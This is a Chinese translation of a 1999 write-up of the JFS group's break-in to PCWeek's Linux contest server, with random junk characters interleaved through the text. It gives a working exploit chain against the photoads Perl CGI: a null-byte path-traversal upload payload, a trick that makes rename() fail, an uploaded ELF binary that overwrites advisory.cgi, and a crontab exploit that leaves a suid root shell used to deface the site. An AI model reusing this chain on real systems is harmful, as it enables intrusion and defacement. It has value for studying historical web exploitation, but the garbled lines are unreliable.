JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

  \) L4 [8 {( ]+ M/ M6 N3 R3 i/ m! L
- O% b3 V$ K! R/ `  {) D首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
: l( o( x9 g( p$ c0 `描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
0 P8 ^" f5 O/ u% J* V1 z2 b# R以我们只能从 HTTP 服务器着手了。

9 g# P5 S$ g+ L" llemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
POST X HTTP/1.0
- @# @4 M# H2 y' l5 G" w( z
% k) h% ^7 F4 c. k" q/ R. bHTTP/1.1 400 Bad Request
& b  j1 o: {% ?! ~5 M# e- GDate: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
9 F  Y" K2 n$ W# |+ k' p6 V! V- d1 Y(...)
Connection closed by foreign host.
lemming:~#

嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
' d$ R8 k- N- c  I( q了网站DocumentRoot下的目录结构：

/
/cgi-bin
8 e: V* k  f0 y8 F( h5 `6 X/photoads/
/photoads/cgi-bin
6 ^+ W  a0 H+ M6 u
4 N) U# e* v! z% H3 g很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
; ]3 f4 g2 A: Y' U0 qwww.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
- r( W, L' [4 ~- Y8 T( c我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
) |3 f/ J! i7 n% F运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
5 u- g3 }: ]% c0 ?- F$ b/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
2 h% O* \5 o, M/ d8 L4 `" `DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
7 t5 m) g; |; d/ J2 I4 Anobody）等。
5 _0 J4 M9 O7 E7 h9 a6 A. [8 ^; [现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
) ^" a% X4 S  ~$ [. }% k! L7 m命令的漏洞，如：

6 j. w$ z( U6 j<!--#include file="..."--> for SSI
3 c8 R& E6 v5 y- I7 Y( g( Q( a1 V* j<!--#perl ...--> for mod_perl
- f- F$ Z# {( ]2 N/ O9 E, A% U
$ C% g& L/ Z- i/ T& o+ U但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
令嵌入到由服务器端解析的 HTML 代码中：

+ d, k8 s5 \+ ?% c- ~) U在 post.cgi，行 36：
" u4 G# m5 [# [8 rprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
7 M* i/ i9 c$ u6 m+ P) V
+ V5 w! q/ h: f" M- L; m9 i$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
/ C# d" r! D6 r0 s( d  N码中。
" b+ [; b7 K" P: R, u请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：

lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
# P8 F5 U, W" Q2 d* d3 b* P
( y/ C+ L; i! i2 B# l但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。
6 J% H+ C& n& q/ ^9 w/ t
因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
. U+ Y% a% d" {9 Zsystem() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
" h- `4 q% y( X& G2 k+ T虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
7 _9 C; ~! v& b
( o) b, _4 e1 X7 j3 k6 Clemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

. A" K' E# n$ a$ Jadvisory.cgi: open (DATA, "$BaseDir/$DataFile");
" v" E  y" H& ?0 r  Medit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
- m$ O2 e0 y, q. {! P2 ?photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
; |8 i7 T0 p4 W2 i1 A8 t1 sphoto.cgi: open ( FILE, $filename );
(...)

  o1 n5 M, s& c3 R9 U$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
% m" N! F+ E9 F1 b& S) g我们利用。
但其余两个就……

: I( o- w1 \8 l在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;
- s: b+ b( k/ i' j9 M+ S/ {
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
& O/ w* y( q$ h* z5 [- kprint ULFD $UPLOAD{'FILE_CONTENT'};
' E* `( R4 @# @close(ULFD);

因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
/ T3 h( \0 g- d& F$write_file 变量来自：

$write_file = $Upload_Dir.$filename;
  q7 `, y6 t; i% s2 R4 ~
% u: M0 ?' Z4 O2 E  Z3 _; D+ @6 k: T其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
' C. U) l: ?: ?# X$ @
; ^4 u/ `4 |( w在 photo.cgi，行 226：
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
. s3 C. ?2 H" C' W
$filename = lc($UPLOAD{'FILE_NAME'});
" L6 ^( [8 u$ w  v  Q  ]0 i8 `$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
2 s* v. o  v6 N! x" \9 l! H
  ]7 ~( r6 M, Xif ($filename =~ m/gif/) {
$type = '.gif';
4 [) G  f% L0 v7 y9 e2 C}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
6 L+ B. x- A4 C& Z  w+ Z$ c}else{
6 n4 h7 C1 Y* A( }{&Not_Valid_Image}
}
7 g- h# `& U6 b' V6 T* U
$ c' z  e6 Z) R" o; f  l由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
6 }* o( ?# ^. m7 F) R# z得任何文件。匹配表达式为：
6 ~- q/ S" ~9 m% |5 G. n
' a' n5 M! \. ~  s  F$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
$ m8 p2 ~1 W, |5 j( o7 G1 H  j( _
7 J" C8 h7 c% K6 n9 |9 b6 `% y0 s2 {我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
( C. i- A, `0 Y6 W1 J; t$ T须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
* L% M0 H/ j: s$ y5 ~经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
; E" J+ r; K# F6 S9 Y+ }2 v
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

/ t: {# z1 B# l可以成功修改WEB服务器根目录下的index.html文件。:-)
$ \4 f3 v5 P- ?; P# ~然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
. \1 k! {. n' s9 X包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
而将主要精力集中在GIF上。
$ I7 P. M1 E% T7 F, m
if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
! M: |7 L3 q5 h( W- J) `+ lmy $head;
) [# j+ Y( K/ ]1 ~5 kmy $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
# S  ]; D" Y- `" b% O& }8 O! Hread FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
5 `. P- Q6 k; y3 ?+ V+ g/ B2 dclose FILE;
8 A# w0 p2 e0 M7 r$PhotoWidth = $width;
3 T$ U- O0 e8 Z+ K2 A$PhotoHeight = $height;
& C3 J2 R' K* d+ e  D$PhotoSize = $size;
return;
}

在 photo.cgi，行 140：

+ P' z9 A  ^, @8 V' cif (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}
% M, p& n6 Z- G* {, n+ U- P: f
if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
8 T. W( F. `8 ^
3 w8 P: q# Z. y; q/ ?! g' ?% x由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
6 t& h! ?6 |1 e. v" N8 [。
- x3 ?% f, f; y; h: I/ ~: C所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
% f6 r3 I: c" y! j# R) h# P对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
（NUL）。
5 ^0 a( k, A9 \) O+ a8 L在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
个问题：

+ @5 p: j4 x& I. {8 U& ~; zchmod 0755, $Upload_Dir.$filename;
! M5 `' k( r/ g' |$newname = $AdNum;
( c( D9 c. J( |, z( }0 Q- P5 v( frename("$write_file", "$Upload_Dir/$newname");
8 p0 U0 P) B! `: J6 f# G4 W, p
, `8 [; q# n, ~& N( t7 i6 vShow_Upload_Success($write_file);

/ ^/ M1 O* @: x哇！文件将被改名/移动（这可是我们绝对不希望的！）。
查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
1 a: S2 M. ~: V! Z2 H5 j0 U
其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
6 N; I7 H# ^* s. P; c那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
( p2 V8 \1 U) R! m# B6 s哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
$ o: F1 |+ I$ n: P8 n3 P: V, w4 p该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
) S3 G  X0 F+ H7 s; l文件名超过1024字节长，即可绕过这个过滤器。
所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
! R' R. M0 a* K发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
% D  Q. r& C/ o! P. V7 E8 }8 Z3 M我们又遇到另一个难题了！……
+ g, g! K3 P( N. w" Z* c9 L
我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
: z0 s3 E- n  c$ c8 q) `- M后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
呢？;-)
' L4 s( a+ t. B3 V! {' |- {. |请阅读用于创建新AD值的程序文件 long.adnum。
当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
5 ]! ?# b4 n( k% `7 F文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。

, Y. W8 g$ y) Y* t+ X, K现在就让我们对该主机试一试这个方法。
+ k2 z; L4 t+ i8 f" N嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
1 {+ u, X* l- @& `9 n成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
% `2 v5 O1 |; z: @, k
, K8 O, n" c+ p5 V! q
让我们试一下是否还有其它入侵方法……
  n. i  q' p7 v* \* F, u- i
" p" M; d% Y, \" S! l; B我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
4 o# g6 B0 u0 W; a些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
+ H1 x$ B/ Z) q" u的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
道它有什么用吗？:)）
: s+ ~& p, J1 P: i4 w  `0 _现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
: M2 L3 I4 H" o4 d0 U/ x% h然而，这个以CGI方式运行的shell脚本必须符合以下格式：

' I, T5 z: ]9 y  n2 l#!/bin/sh
( w1 Y( G$ V9 Q4 yecho "Content-type: text/html"
find / "*secret*" -print

同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……
6 p+ s: L; U- F! x* g6 ]  V
# N& y+ ?! g0 P#!/bi\00\00\00\00n/sh

7 T# @$ _: a3 S/ O以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
" N1 w& l. X! u0 S0 f3 a我们无法只用三个字节去获得一个shell。又遇到难题了！:(
, _+ k5 R4 |- G; i9 t/ `; L1 ~
! I; W5 m/ @; d4 Q* k- [  p; ?让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
' p6 n! R/ l) h$ I解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
, s& D7 q) _+ m& X件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
7 v8 Z# x9 [+ g$ E6 d! gURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。

以下这个程序：

% G7 ?& ~2 o3 k/ ?, I% r9 M* Qlemming:~/pcweek/hack/POST# cat fin.c
#include <stdio.h>
main()
$ f8 o4 A5 ~6 h{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
1 N- q# o6 O" Z) n, |  J" ?2 Z6 Cexeclp("/usr/bin/find","find","/",0);
$ h! J4 y/ J" W- `/ n) [}

编译后：
% k, m( T0 J( b. \+ l7 B
; `: P0 y1 D. l( }8 Nlemming:~/pcweek/hack/POST# ls -l fin
% U* C/ Y- [! C& u-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

优化（清除symbols）后：
" P% H/ `9 `8 H6 X8 m1 @0 ?
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
# D$ l; }+ s8 `: w$ U-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

URL编码后：
. l7 _0 z9 s& z8 r; T
* t5 Q, I* ?' O% G$ g* o& B0 z# Flemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
8 {6 @1 G8 T0 \7 C) v6 f-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
  w, ^8 L4 j  A; g$ d8 J8 ^
4 H$ G7 S0 w* t" B8 C这个文件大小超过了限制值。:(
% c3 m* s" s: E5 ^8 [% O* E8 t5 S! B我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：

) I4 D; a) Q, F+ g1 t0 X5 S4 {, Q7 rlemming:~/pcweek/hack/POST# joe fin
. R! K8 U- I# @lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
0 X% f, c( H1 }8 L. }- ^lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
) O% u$ {1 r! o. ~- L: u, q-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
" l- B$ n1 A1 z) X6 rlemming:~/pcweek/hack/POST#
0 o% W/ ]' u; ?; }9 F
4 |* r0 q- P, g! T5 G7 d% a$ `请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
2 N; }& N9 f" x. o
: G4 h# E  M  T. Z  C现在，将这个CGI上载到服务器，再用浏览器访问它，如：

; k: Y3 o! C( H' @3 v1 O& jwget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
( i- F3 s+ d( q2 J0 [( g$ ~  E- |
8 j3 ]  `/ ?) M, Z" Q" E/ k服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
1 y" N# j5 S& _6 J9 j[我怀疑这些文件是否真的保存在该服务器上！]
5 P+ M7 ]- t" B$ _8 w* ]
. m  @4 W8 i( b( E' E$ D
9 Q6 ?3 r  Q2 K# }" e好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
' o( I2 [7 _  e* q, b9 l轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
- k8 Z7 U7 H; W用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
观察其运行结果。
我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

3 Z. N: E+ e9 zexeclp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
/ p# ?, I6 d- D: z
0 f/ Q  a: S& J+ k) b好了。游戏结束！:)
; \& B0 \9 \# d  d. x8 ]7 ^3 e总共花费了大约20个小时，还算不错！呵呵。:)
0 b5 ^) m% W2 B/ k$ Q